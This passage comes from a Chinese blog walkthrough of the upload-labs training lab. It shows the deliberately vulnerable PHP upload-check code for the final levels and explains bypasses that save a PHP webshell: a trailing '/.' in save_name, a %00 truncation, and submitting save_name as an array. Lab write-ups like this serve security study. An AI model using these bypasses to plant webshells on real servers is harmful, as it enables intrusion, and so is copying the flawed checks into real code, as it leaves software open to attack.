            &#125;<span class="hljs-keyword">else</span>&#123;
                $msg = <span class="hljs-string">&#x27;上传出错！&#x27;</span>;
            &#125;
        &#125;<span class="hljs-keyword">else</span>&#123;
            $msg = <span class="hljs-string">&#x27;禁止保存为该类型文件！&#x27;</span>;
        &#125;

    &#125; <span class="hljs-keyword">else</span> &#123;
        $msg = UPLOAD_PATH . <span class="hljs-string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;
    &#125;
&#125;</code></pre>

<p>可以看到，这里img_path可控（通过post sava_name），所以可以利用move_uploaded_file的\x00截断(save_name=ma.php%00.jpg)绕过,但\x00截断之前关卡已经出现过了，这里明显是考察别的知识点。于是网上找找别人的答案，发现考点是:move_uploaded_file会忽略掉文件末尾的/.所以可以构造save_path=ma.php/.,这样file_ext值就为空，就能绕过黑名单，而move_uploaded_file函数忽略文件末尾的/.可以实现保存文件为.php</p>
<p><strong>绕过</strong></p>
<p>burp抓包末尾添加：<code>save_name=ma.php/.</code>，注意马的名字与filename一致</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215173229186.png" srcset="/img/loading.gif" alt="image-20210215173229186"></p>
<p>当然也可以传个图片马子</p>
<p>也可以直接在上传处保存文件名哪里后面加<code>/</code>或者<code>.</code>都可</p>
<h3 id="Pass-20：数组-绕过-1"><a href="#Pass-20：数组-绕过-1" class="headerlink" title="Pass-20：数组/.绕过"></a>Pass-20：数组/.绕过</h3><p>后台代码</p>
<pre><code class="hljs php">$is_upload = <span class="hljs-literal">false</span>;
$msg = <span class="hljs-literal">null</span>;
<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>($_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>]))&#123;
    <span class="hljs-comment">//检查MIME</span>
    $allow_type = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;image/jpeg&#x27;</span>,<span class="hljs-string">&#x27;image/png&#x27;</span>,<span class="hljs-string">&#x27;image/gif&#x27;</span>);
    <span class="hljs-keyword">if</span>(!in_array($_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;type&#x27;</span>],$allow_type))&#123;
        $msg = <span class="hljs-string">&quot;禁止上传该类型文件!&quot;</span>;
    &#125;<span class="hljs-keyword">else</span>&#123;
        <span class="hljs-comment">//检查文件名</span>
        $file = <span class="hljs-keyword">empty</span>($_POST[<span class="hljs-string">&#x27;save_name&#x27;</span>]) ? $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>] : $_POST[<span class="hljs-string">&#x27;save_name&#x27;</span>];
        <span class="hljs-keyword">if</span> (!is_array($file)) &#123;
            $file = explode(<span class="hljs-string">&#x27;.&#x27;</span>, strtolower($file));
        &#125;

        $ext = end($file);
        $allow_suffix = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;jpg&#x27;</span>,<span class="hljs-string">&#x27;png&#x27;</span>,<span class="hljs-string">&#x27;gif&#x27;</span>);
        <span class="hljs-keyword">if</span> (!in_array($ext, $allow_suffix)) &#123;
            $msg = <span class="hljs-string">&quot;禁止上传该后缀文件!&quot;</span>;
        &#125;<span class="hljs-keyword">else</span>&#123;
            $file_name = reset($file) . <span class="hljs-string">&#x27;.&#x27;</span> . $file[count($file) - <span class="hljs-number">1</span>];
            $temp_file = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];
            $img_path = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span> .$file_name;
            <span class="hljs-keyword">if</span> (move_uploaded_file($temp_file, $img_path)) &#123;
                $msg = <span class="hljs-string">&quot;文件上传成功！&quot;</span>;
                $is_upload = <span class="hljs-literal">true</span>;
            &#125; <span class="hljs-keyword">else</span> &#123;
                $msg = <span class="hljs-string">&quot;文件上传失败！&quot;</span>;
            &#125;
        &#125;
    &#125;
&#125;<span class="hljs-keyword">else</span>&#123;
    $msg = <span class="hljs-string">&quot;请选择要上传的文件！&quot;</span>;
&#125;</code></pre>

<p>可以发现<code>$file_name</code>经过<code>reset($file) . &#39;.&#39; . $file[count($file) - 1];</code>处理。</p>
<p>如果上传的是数组的话，会跳过<code>$file = explode(&#39;.&#39;, strtolower($file));</code>。并且后缀有白名单过滤</p>
<pre><code class="hljs xquery"><span class="hljs-variable">$ext</span> = <span class="hljs-keyword">end</span>(<span class="hljs-variable">$file</span>);
<span class="hljs-variable">$allow_suffix</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;jpg&#x27;</span>,<span class="hljs-string">&#x27;png&#x27;</span>,<span class="hljs-string">&#x27;gif&#x27;</span>);</code></pre>

<p>而最终的文件名后缀取的是<code>$file[count($file) - 1]</code>，因此我们可以让<code>$file</code>为数组。<code>$file[0]</code>为<code>smi1e.php/</code>，也就是<code>reset($file)</code>，然后再令<code>$file[2]</code>为白名单中的jpg。此时<code>end($file)</code>等于jpg，<code>$file[count($file) - 1]</code>为空。而 <code>$file_name = reset($file) . &#39;.&#39; . $file[count($file) - 1];</code>，也就是<code>smi1e.php/.</code>，最终<code>move_uploaded_file</code>会忽略掉<code>/.</code>，最终上传<code>smi1e.php</code>。</p>
<p><strong>绕过</strong></p>
<p>burp抓包修改为数组，如下</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215181210201.png" srcset="/img/loading.gif" alt="image-20210215181210201"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>
                    
                  </div>
                
                
              </div>
              
                <p class="note note-warning">转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/01/windows%E5%9F%BA%E7%A1%80/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">windows基础</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/06/01/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
                        <span class="hidden-mobile">文件上传</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div> -->
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "upload-labs通关记录&nbsp;",
      ],
      cursorChar: "",
      typeSpeed: 100,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  














</body>
</html>
